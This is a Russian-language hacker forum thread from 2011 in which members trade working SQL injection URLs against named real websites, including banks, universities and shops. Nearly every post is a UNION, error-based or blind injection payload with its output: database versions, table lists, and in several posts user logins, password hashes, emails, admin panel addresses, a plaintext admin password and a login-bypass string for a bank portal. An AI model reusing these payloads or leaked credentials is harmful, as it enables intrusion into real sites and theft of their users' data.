http://board.bizua.com.ua/index.php?id_typ=276+union+select+1,2,3,4,5,6,CONC AT_WS(0x3a,user(),version(),DATABASE()),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
FIDEPP_SE1@LOCALHOST:5.2.4-MARIADB:FIDEPP_SE1
Albseera
11.11.2011, 18:55
Помогите разобраться с этим монстром , никак не получается раздобыть таблицы :
http://ch eck-e ngine.ru/support.php?idt=-1+UNION+SELECT+1,version(),3,4--
4.0.27-log
Неужели кроме брута здесь никак ?
loongson.cn
www.loongson.cn
[PR = 5]
[тИЦ = 10]
Code:
http://www.loongson.cn/solutions_two.php?id=45+AND+1=2+UNION+SELECT+1,2,3 ,4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE( ))+--+
или
http://www.loongson.cn/product_info.php?id=31+AND+1=2+UNION+SELECT+1,2,3, 4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE() )+--+
hongjun@localhost-5.0.51a-24+lenny2-loongson_www_cn
Из интересного: у администратора мощный пароль =]
Кстати, знаете что такое Loongson? Ссылка: ru.wikipedia.org/wiki/Loongson (http://ru.wikipedia.org/wiki/Loongson)
www.heroworld.net
[PR=4]
[тИЦ=10]
Code:
http://www.heroworld.net/news.php?id=957+AND+1=2+UNION+SELECT+1,2,3,4,CONCA T_WS(CHAR(45),USER(),VERSION(),DATABASE()),6,7,8,9 ,10+--+
ghevilp@localhost-5.1.53-heroworld_top
aydin-ka
12.11.2011, 16:41
тиЦ 325 PR 5
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,1 5,16+--+
test77@localhost:test77_cl_spbnews_ru:5.0.67
Таблицы
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_conca t%28table_name%29,15,16+FROM+INFORMATION_SCHEMA.TA BLES--
PHP:
albums_de,albums_en,albums_es,albums_fr,albums_ru, ban_de,ban_en,ban_es,ban_fr,ban_ru,bantyp,carousel _de,carousel_en,carousel_es,carousel_fr,carousel_r u,catalog_de,catalog_en,catalog_es,catalog_fr,cata log_ru,catitem_de,catitem_en,catitem_es,catitem_fr ,catitem_ru,cns_advert_pages,cns_advert_referers,c ns_cache_advert_cost,cns_cache_destinations,cns_ca che_referers,cns_cache_robots,cns_cache_servers,cn s_config,cns_counter,cns_counter_total,cns_data,cn s_filteritems,cns_filterlist,cns_filterrelation,cn s_goodies,cns_googlecache,cns_ipalias,cns_language s,cns_log,cns_openstat,cns_restorepassword,cns_rss _cache,cns_rss_rebuild,cns_size,cns_slide_cache,cn s_slides,cns_subnets,cns_today,cns_users,cns_users _access,cns_users_sessions,cns_who_cache,contact_d e,contact_en,contact_es,contact_fr
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_conca t%28id_user,0x3a,report%29,15,16+from+cns_users_ac cess--
php info - http://www.ladogaspb.ru/phpinfo.php
SQLinj In SQLinj
Code:
http://erfen.ru/antispam/region.php?num=9631234567+and+1=2+union+select+1,2 +--+
Встроенный запрос!
Code:
http://erfen.ru/antispam/region.php?num=9631234567 and 1=2 union select '2 and 1=3 union select concat_ws(0x3b,version(),user(),database()) -- ',0 --+
www.maginfo.com.ua/cat.php?id=-1+union+select+table_name+from+information_schema. tables--
Boolean Подскажи, для чего используют встроенный запрос?
shadowrun
13.11.2011, 19:17
Code:
http://www.captainsofcrush.ru/grippers/info.php?id=-18+union+select+1,photo2,3,4,5,6,7,8+FROM+catalog+--+
ТИЦ - 30
PR - 3
Code:
http://www.povituha.ru/news.php?id=9999999+union+select+1,2,database,4,5, 6+--+
ТИЦ - 50
PR - 3
Code:
http://dizelbox.net/news.php?id=-1+union+select+1,database%28%29,3,4,5+--+
ТИЦ - 0
PR - 3
админка
Code:
http://dizelbox.net/adm/indexx.php
admin:zx89pe531yz
Code:
marketing.rbc.ua/file.php?id=-1+union+select+CONCAT_WS(0x3a,user(),version(),DAT ABASE()),2,3+--+
research@localhost:5.0.91:rbc_research_new
ТИЦ -140
PR - 5
Code:
http://www.feldgrau.com/articles.php?ID=-32+union+select+1,2,3,4,5,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,7,8--+
5.0.51a-3ubuntu5.8:feldgrau:feldgrau@localhost
Code:
http://www.choices.edu/resources/detail.php?id=-32+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--+
4.1.22-log:Choices:choices@skylark.services.brown.edu
shadowrun
14.11.2011, 11:22
Code:
http://keystone.com.ua/print_ground.php?id=-2451+union+select+concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,2,3,4,5,6,7,8,9,10,11, 12,13,14+--+
PR -4
ТИЦ - 60
Code:
http://autoline24.com.ua/russian/search.php?id=1%27+union+select+1,2,3+--+
Чето дальше нивкакую
aydin-ka
14.11.2011, 18:40
тИЦ 210 Трафик 2К
Code:
http://2010001.ru/news/index.php?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,concat_ws%280x3a,user%28%29,database%28%29,ver sion%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
h2zhilf_ramm@localhost:h2zhilf_news:5.0.77
Таблицы
Code:
http://2010001.ru/news/index.php ?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLE S--
PHP:
users,basa,basa_comm,basa_comm_biz,basa_comm_hot,b asa_comm_hot_top,basa_comm_pur,basa_comm_region
Вывод из колонок
Code:
http://2010001.ru/news/index.php ?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,concat_ws(user_id,0x3a,login),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+FROM+users--
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT%28concat_ws%280x3a,email,nam e,description%29%29,2,3,4,5,6,7,8,9+from+news_auto rs%20%20limit%200,1--
Смотрите внимательно слева
Админка (http://presscenter.kz/modules/psw.php)
Coffee Board of India - www.indiacoffee.org
[PR=5]
[тИЦ=10]
Code:
http://indiacoffee.org/indiacoffee.php?page=MarketInfo%27+AND+1=2+UNION+S ELECT+CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE ())+--+
indiacof@67.15.184.41-5.0.84-percona-highperf-b18-log-indiacoffee
Интересные таблички: tb_admin_user, tb_user_details, user_data
Администраторы: Dr.Babu Reddy, Mr.Bharath Kumar, Mr.Mohandas
...а в целом, вкусная кофейная компания...
городской информационный портал
http://krasnoturinsk.org/cgi-bin/news/index.pl?id=-381+union+all+select+1,concat_ws(char(58),@@versio n,user(),database()),3,4,5,6,7,8,9,10,11--#.TsICu4SHHsz
4.1.22 reporter@host245.fnet2.ae21vek.ru TEST
HellFire
15.11.2011, 11:54
Code:
http://isaxon.com/ru/album.php?id=1-999999999.9+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECRY PT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64),0x71),0x71),10--
Database Version: 5.5.17-log
Database name: cxm
User name: cxm@localhost
Какая-то шняга с текстами песен...
Code:
http://knifetricks.ru/market/more.php?id=1-0.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71),3,4,5,6,7,8,9,10,11--
Database Version: 5.0.77-log
Database name: rosforex_1
User name: rosforex_1@localhost
Сделанный на коленке русский шоп ножей...
Мой сайт
Тиц 700 траф ~4500 К в сутки
Вывод в титле
http://www.
oxothik.ru
/index.php?action=articles&id=-114+union+select+version%28%29
Если кто знает как пройти дальше, напишите пожалуйста в личку.
tabletkO
16.11.2011, 14:32
OxoTnik,
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+table_name+from+information_s chema.tables+--+
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+login+from+tour_users+limit+0 ,1+--+
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+password+from+tour_users+limi t+0,1+--+
А чего тут сложного?)
P.S. %0A = Enter...
Тиц 700 траф ~4500 К в сутки
Друг, "к" означает три нуля, т.е. 1k = 1000, 2.5k = 2500 и т.д. А тут 4500K это уже 4.5 миллиона
-------------------------------
По сабжу:
тИЦ 10
Code:
http://www.topreferat.com/josparesep.php?id=7+union+%0A+select+1,table_name, 3,4+from+information_schema.tables+--+
Code:
http://www.egolife.kz/catalog/showproduct/id/18+union+select+concat_ws%28user%28%29,version%28% 29,database%28%29%29,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,12,43,44,45,46,47 ,48
http://www.hazart.ru/index.php?id=-43+union+select+1,2,3,4,5,concat_ws%280x3a,user_id ,user_login,user_pass%29+from+admin_users--
Сайт скучный, трата времени, пассы не смог расшифровать за 3 дня полным перебором 12 символов
http://www.kubanjob.ru/vacanc.php?id=-1+union+select+1,2,3,4,5,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,7,8,9,10,11,12, 13,14,15,16,17,18,19,20
4 мускул
shadowrun
17.11.2011, 23:38
Code:
http://zenit.nevasport.ru/text.php?id=-13%27+union+select+1,group_concat%280x3a,table_nam e%29,3,concat_ws%280x3a,database%28%29,user%28%29, version%28%29%29,5+from+information_schema.tables+--+
PR - 4
ТИЦ - 50
aydin-ka
18.11.2011, 00:09
PR 4
Code:
http://rent4day.am/info.php?lang=3&id=999999999+union+select+1,2,3,4,5,6,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,8, 9,10,11,12,13,14,15,16,17,18,19,20--
rent4day_rent@localhost:rent4day_rent4day:5.0.92-community-log
Таблицы
Code:
http://www.rent4day.am/info.php?lang=3&id=999999999+union+select+1,2,3,4,5,6,GrOuP_CoNcat %28table_name%29,8,9,10,11,12,13,14,15,16,17,18,19 ,20+FROM%20INFORMATION_SCHEMA.TABLES%20--
stepashka_
18.11.2011, 11:44
http://www.elektra-77.kh.ua/doska6/ind.php?pn=776&id_typ=17+union+select+1,2,3,4,5,6,version(),8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3+--+
4.1.25-log
Code:
http://www.desktopmachine.com/framepic.php?id=2390+union+select+1,2,3,4,5,6,7,8, 9,10,11,cast%28concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29%20as%20binary%29,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29--&size=1024
desktop@localhost:4.1.14:desktop
Google PR: 4
stan0009
18.11.2011, 20:00
сори за оффтоп)
исправляюсь:
http://www.surfcitygarage.com/detail1.php?product_id=351
Траф = 4К
Database Version : MySQL 4.1
Current database : desktop
http://stalkerfest.org/page.php?page=42&iD=-1+union+select+1,2,version%28%29,4,5,6,7,8,9
4 символа
kallstrom
19.11.2011, 00:32
http://estpovod.ru/games.php?target=section&id=6
PR 4
тИЦ 190
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: target=section&id=6 AND SLEEP(5)
Data Base Found: information_schema
Data Base Found: Sql286973_1
Data Base Found: Sql286973_2
Data Base Found: Sql286973_3
Data Base Found: Sql286973_4
Data Base Found: Sql286973_5
aydin-ka
19.11.2011, 00:43
kallstrom said:
PR
4
тИЦ
190
Раскрутил
Code:
http://estpovod.ru/games.php?target=section&id=9999999+union+select+concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29--
Code:
http://estpovod.ru/games.php?target=section&id=9999999+union+select+group_concat%28table_name% 29+from+information_schema.tables--
kallstrom
19.11.2011, 01:16
http://www.vaal.ru/show.php?id=91
PR 4
тИЦ 150
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91 AND 9682=9682
available databases [1]:
vaal119
kallstrom
19.11.2011, 02:20
http://www.fckamaz.ru/pages/news.php?id=1130
PR 4
тИЦ 600
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1130' AND (SELECT 4682 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,1
07,107,58),(SELECT (CASE WHEN (4682=4682) THEN 1 ELSE 0 END)),CHAR(58,111,100,10
7,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'HYxg'
='HYxg
available databases [3]:
fckamazru
fckamazru_wordpress
information_schema
shadowrun
19.11.2011, 22:45
Code:
http://libinfo.org/index.php?id=-8787+union+select+1,2,3,4,5,concat_ws%280x0b,name, 0x3a,pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+users+--+
ТИЦ - 30
PR - 4
Code:
http://www.toramp.com/tnews.php?id=-16%27+union+select+1,2,3,group_concat%280x0b,usern ame,0x3a,passhash%29,5,6,7,8,9,10,11+from+users+--+
kallstrom
20.11.2011, 16:22
http://math.ucsd.edu/people/profile.php?id=2020
ТИЦ - 110
PR - 6
[QUOTE="None"]
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL
stepashka_
20.11.2011, 18:10
http://www.495-irr.ru/ind.php?id_typ=-138+/*!UNION*/+SELECT+1,2,3,4,5,6,/*!table_name*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33+from+information_schema .tables+--+
Логин от админки не нашёл(
kallstrom
20.11.2011, 23:48
http://www.drummajorinstitute.org/library/article.php?ID=5518%20AND%20(SELECT%208461%20FROM( SELECT%20COUNT(*),CONCAT(CHAR(58,121,111,121,58),( SELECT%20MID((IFNULL(CAST(schema_name%20AS%20CHAR) ,CHAR(32))),1,50)%20FROM%20information_schema.SCHE MATA%20LIMIT%201,1),CHAR(58,121,102,112,58),FLOOR( RAND(0)*2))x%20FROM%20information_schema.tables%20 GROUP%20BY%20x)a)
PR 6
тИЦ 10
kallstrom
21.11.2011, 00:03
http://www.zionpark.org/prod.php?id=30%20AND%20(SELECT%201710%20FROM(SELEC T%20COUNT(*),CONCAT(CHAR(58,98,115,99,58),(SELECT% 20MID((IFNULL(CAST(schema_name%20AS%20CHAR),CHAR(3 2))),1,50)%20FROM%20information_schema.SCHEMATA%20 LIMIT%201,1),CHAR(58,120,108,120,58),FLOOR(RAND(0) *2))x%20FROM%20information_schema.tables%20GROUP%2 0BY%20x)a)
PR 5
kallstrom
21.11.2011, 00:11
http://www.loginstitute.ca/moreinfo.php?id=1
PR 6
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1076=1076
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
available databases [1]:
logistics_db
kallstrom
21.11.2011, 00:22
http://www.raconline.org/funding/funding_details.php?funding_id=-3817%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,109,109 ,106,58),IFNULL(CAST(schema_name%20AS%20CHAR),CHAR (32)),CHAR(58,104,121,111,58)),%20NULL,%20NULL,%20 NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NU LL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL%20FROM%20information_sche ma.SCHEMATA%20LIMIT%202,1#
PR 7
тИЦ 10
mixfevers.com
Code:
http://www.mixfevers.com/page.php?PageType=-9999999'+UNION+SELECT+1,2,CONCAT_WS('-',USER(),VERSION(),DATABASE())+--+
admin@localhost-5.0.45-mix_pages
...очень много понятных и не очень таблиц, а толку никакого... есть что-то вроде самопальной системы биллинга...
Code:
http://mixfevers.com/clientlogin.php
...в которой "живет" один клиент... =]
ID=1 Trey Alexander delawaredogsupplies@yahoo.com
shadowrun
21.11.2011, 12:26
Code:
http://www.cryptocrat.com/show_node.php?id=-40%27+union+select+1,2,group_concat%28column_name% 29,4,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273+--+
Code:
http://pisateli.co.ua/page.php?id=-383%27+union+select+1,group_concat%28email,0x3a,pa ssword%29,3,4+from+kiev_forum_users+--+
Code:
http://shake.metroland.ru/drink/view_drink.php?id=-6%27+union+select+1,group_concat%28database%28%29, version%28%29,user%28%29%29,3,4,5,6,7+--+
kallstrom
21.11.2011, 13:40
http://www.nmlra.org/store.asp?CatID=-518%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,N ULL,(SELECT%20TOP%201%20CHAR(58)+CHAR(108)+CHAR(11 7)+CHAR(106)+CHAR(58)+ISNULL(CAST(name%20AS%20NVAR CHAR(4000)),CHAR(32))+CHAR(58)+CHAR(113)+CHAR(106) +CHAR(117)+CHAR(58)%20FROM%20master..sysdatabases% 20WHERE%20ISNULL(name,CHAR(32))%20NOT%20IN%20(SELE CT%20TOP%20136%20ISNULL(name,CHAR(32))%20FROM%20ma ster..sysdatabases%20ORDER%20BY%201)%20ORDER%20BY% 201)--
PR=5
TYC=10
Alexa=3,358,182
kallstrom
21.11.2011, 16:21
http://www.teach-nology.com/lessons/lsn_pln_view_lessons.php?action=view&cat_id=10 AND (SELECT 6010 FROM(SELECT COUNT(*),CONCAT(CHAR(58,107,113,116,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 3,1),CHAR(58,101,122,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=6
TYC=40
Alexa=46,282
Тиц 1700
http://www.solvex.ru/agents/?uid=-1/**/union/**/select/**/1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29, database%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17--
version():5.1.39
user():root@localhost
database():solvexmdb
file_priv:Y
Пригодиться для шела
http://www.solvex.ru/info.php
kallstrom
21.11.2011, 18:37
Немного клубнички)
http://www.sex-leshiy.ru/sex_post.php?id=96' AND (SELECT 88 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,107,109,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 15,1),CHAR(58,118,108,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'skIN'='skIN
PR=3
Alexa=1,405,386
kallstrom
21.11.2011, 19:42
Раскрутил:
http://roosterteeth.com/faq/?id=8 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,120,107,103,58),IFNULL(CAST(schema_ name AS CHAR),CHAR(32)),CHAR(58,114,109,119,58)), NULL FROM information_schema.SCHEMATA#
kallstrom
21.11.2011, 20:05
Что-то об отдыхе...
http://www.clubmed.ru/villages/village.php?id=12 AND (SELECT 9101 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,112,103,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,117,102,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
тИЦ=300
Alexa=2,705,110
ku6ep_xayS
21.11.2011, 20:46
баз подгон в виде он-лайн шопа=)
http://bookvica.com.ua/shop.php?id=-300+union+select+1,2,concat(login,char(58),pass),4 ,5,6,7,8,9,10,11,12,13+from+users--
kravch_v
21.11.2011, 23:46
Code:
http://www.playonline.com.ua/game.php?id=1313+and%28select+1+from%28select+coun t%28*%29%2Cconcat%28%28select+%28select+concat%280 x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+a s+char%29%29%29%2C0x27%2C0x7e%29%29+from+informati on_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280 %29*2%29%29x+from+information_schema.tables+group+ by+x%29a%29+and+1%3D1
PHP/5.2.14
Версия: 5.0.51a-community
БД: dvdpoisk_pl
Юзер: dvdpoisk_pl@localhost
Таблицы: categories,games,games2,rotation
kallstrom
22.11.2011, 00:46
Игрушки)
До меня этот сайт видимо отымели иранцы))
http://gametrove.net/company.php?id=24 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1,1),1,1)) > 103
PR=4
тИЦ=10
Alexa=764,873
В Общем вот что нашёл
http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+%0A+union+%0A+select+concat_ws%280x3a,ID,NAME,DO L,ORG,MAIL%29+%0A+from+%0A+profsh_user+%0Alimit%20 0,1--
kallstrom
22.11.2011, 18:37
Генетика и общество
http://www.geneticsandsociety.org/article.php?id=4519 AND (SELECT 512 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,118,106,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,98,103,113,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=5
тИЦ=20
kallstrom
22.11.2011, 19:03
Прикольные GIF-ки))
http://www.omfgif.com/gif.php?id=4961 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,122,99,58),IFNULL(CAST(schema_n ame AS CHAR),CHAR(32)),CHAR(58,97,119,114,58)), NULL, NULL FROM information_schema.SCHEMATA#
tabletkO
22.11.2011, 19:33
PostgreSQL
тИЦ 10
HTML:
http://www.24fishing.ru/fish/fish.php?id=-1+union+select+null,version(),null,null,null,null--
Result:
HTML:
PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
P.S. Первая скулья PostgreSQL )
----
MySQL
PR 5
HTML:
http://www.killarney.ie/fish.php?id=-1+union+select+1,table_name,3,4,5,6,version(),user (),database(),10,11,12,13,14,15,16+from+informatio n_schema.tables--+
Вывод всего)
nemaniak
22.11.2011, 21:15
resi.at PR-5
Code:
http://www.resi.at/resi-nr/beitrag.php?id=-1393+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21,22,23+--+
Code:
5.1.41-3ubuntu12.10:c0resi@localhost:c0resi
*в тайтле
goonersguide.com PR-4 alexa-82k
Code:
www.goonersguide.com/read_news_item.php?newsID=-490+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11+--+
Code:
4.1.22-community-nt:pk@208.118.249.170:goonersguide
ergo-russ.com ТИЦ-650
Code:
http://www.ergo-russ.com/press-news-detail.php?news_id=-49+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4+--+
Code:
4.0.27-log:zao_rus@195.242.3.251:zao_rus
kallstrom
23.11.2011, 01:34
Сайт о немецкой армии 1918-1945 гг
http://www.feldgrau.com/PzDiv.php?ID=2 UNION ALL SELECT NULL, CONCAT(CHAR(58,111,105,122,58),IFNULL(CAST(schema_ name AS CHAR),CHAR(32)),CHAR(58,109,101,122,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.SCHEMATA#
PR=5
тИЦ=40
Alexa=904,998
---------------------
Что-то о запчастях к мотоциклам
https://www.kisantech.com/index.php?cat_id=-9792 OR NOT ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1,1),11,1)) > 97
Здесь Blind, как смог так и показал)
worstpreviews.com
[тИЦ=130]
[PR=5]
Code:
http://www.worstpreviews.com/headline.php?id=999999999+AND+1=2+UNION+SELECT+1,2 ,3,4,5,6,7,CONCAT_WS('-',USER(),VERSION(),DATABASE()),9,10,11+--+
alexgi_2@localhost-5.1.56-log-alexgi_worstreview
а базу форума [vBulletin™ Version 4.0.1] обнаружить не удалось. подозреваю, что она находится не на localhost... а жаль =]
kallstrom
23.11.2011, 21:34
Магазин электроаппаратуры
http://www.vt4c.com/shop/program/main.php?group_id=2 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 117
Boolean-based blind
PR=3
Alexa=10,414,839
Какие то четри с Москвы
http://www.mosoblproc.ru/news/?id=950+and+1=0+union+select+1,2,3,table_name,5,6+ from+information_schema.tables--+&print=1
stan0009
24.11.2011, 00:23
zenon3 said:
http://www.nfasp.org.uk/events_single.php?id=1110'
Помогите разобрать. Что то вообще не понимаю что там за фильтрация.
blind юзай
kacergei
24.11.2011, 00:35
stan0009 said:
blind юзай
помимо той ссылки еще тут blind:
Target: http://www.nfasp.org.uk/resources_listing.php?typeid=2{blind}
База: cmsdb
kallstrom
24.11.2011, 00:40
Встречайте! Эскорт-услуги по всему миру!
http://rome.allworldescorts.com:80/profile.php?ad_id=504&category=VIP Escorts
Place: GET
Parameter: ad_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ad_id=504' AND 6865=6865 AND 'QfsV'='QfsV&category=VIP Escorts
[PR=3]
Code:
http://www.killfromtheheart.com/albums.php?id=2128+AND+1=2+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,CONCAT_WS(CHAR(45,45),USER(),V ERSION(),DATABASE()),15,16,17,18,19,20+--+
datapass@cgi0702.int.bizland.net--5.0.91-log--kfth_data
Code:
http://www.killfromtheheart.com/admin/
tabletkO
24.11.2011, 09:58
тИЦ 120
Банк... В продолжении темы /thread304582.html (https://antichat.live/threads/304582/)
HTML:
http://www.vitasbank.ru/list.php?id=-1)+union+select+version()--+1
lion-art
24.11.2011, 11:22
Банк?
tabletkO said:
тИЦ 120
Банк... В продолжении темы
/thread304582.html (https://antichat.live/threads/304582/)
HTML:
http://www.vitasbank.ru/list.php?id=-1)+union+select+version()--+1
ну раз пошло такое дело
https://client.uniastrum.ru/Login.aspx?ReturnUrl=%2fdefault.aspx
login: hi' or 1=1--
pass: hi' or 1=1--
"Американский Кризис "=/
Site:www.americancrisis.us
PR=4
Alexa=2 862 020
Inject
Code:
_ttp://www.americancrisis.us/Home.php?MI=9+and+1=2+union+select+null,null,null, database(),null,null,null,null,null,null
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm2@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"Африканский Кризис" =/
Site:www.picknclick.biz
PR=3
Alexa=8 991 159
Inject
Code:
_ttp://www.picknclick.biz/Home3.php?S=11+and+1=2+union+select+1,2,3,database (),5,6,7,8,9,10,11,121,31,4,15,16,17,18,19,20,21+--+
Version:4.1.20-max-log
Database:JanAFC_picknclick
User:JanAFC_Pgm1@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"Исторический Кризис" =/
Site:www.historyreviewed.com
PR=3
Alexa=15 242 051
Inject
Code:
_ttp://www.historyreviewed.com/Home.php?MI=243+and+1=2+union+select+1,2,3,version (),5,6,7,8,9,10
Version:5.0.91-log
Database:jangdgenweb
User:jangdgenweb@184.168.152.144
-----------------------------------------------------
-----------------------------------------------------
"Трудовой Кризис" =/
Site:www.drudgereportarchives.net
PR=3
Alexa=2 905 350
Inject
Code:
_ttp://www.drudgereportarchives.net/Home.php?MI=277+and+1=2+union+select+1,2,3,version (),null,6,7,8,9,10
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm3@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"Рыночный Кризис" =/
Site:www.stocktipster.net
PR=3
Inject
Code:
_ttp://www.stocktipster.net/Home.php?MI=124+and+1=2+union+select+1,2,3,version (),null,6,7,8,9,10
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm2@72.41.255.242
kacergei
24.11.2011, 17:18
http://www.artem.ua/news/index.php?id_art=99{sql}
DB Server: MySQL >=4.1
Current DB: webartem
Нашел только табличку news может кто поможет раскрутить?
ТИЦ 160
http://www.saltykov.net.ru/lib/ar/author/-1+union+select+1,2,schema_name,4,5,6+from+informat ion_schema.schemata%20limit%208,1
tabletkO
24.11.2011, 17:29
kacergei said:
http://www.artem.ua/news/index.php?id_art=99{sql}
DB Server: MySQL >=4.1
Current DB: webartem
Нашел только табличку news может кто поможет раскрутить?
HTML:
http://www.artem.ua/news/index.php?id_art=-1+union+select+1,version(),3,4,5,6,7,8,9,10--+1
4.1.25-log
PR 6 Тиц 3500
Тиц 3500
DB User: 'mba'@'localhost'
Host Name: nn1.r52.ru
Sql Version: 5.0.51a
http://
r52.ru
/index.phtml?mod=seminars&seminarid=89/**/union/**/select/**/1,concat_ws%280x3a,version%28%29,database%28%29,us er%28%29%29,3,4,5,6,7,8
OxoTnik said:
Тиц 3500
DB User:
'mba'@'localhost'
Host Name:
nn1.r52.ru
Sql Version:
5.0.51a
site:forum.antichat.ru r52.ru
BLurpi^_^
24.11.2011, 18:43
Code:
http://love.pankotskiy.ru/stat.php?id=1
Code:
http://www.blog-seo.ru/index-stat.php?id=6
есть табла с юзерами(~1к)
Code:
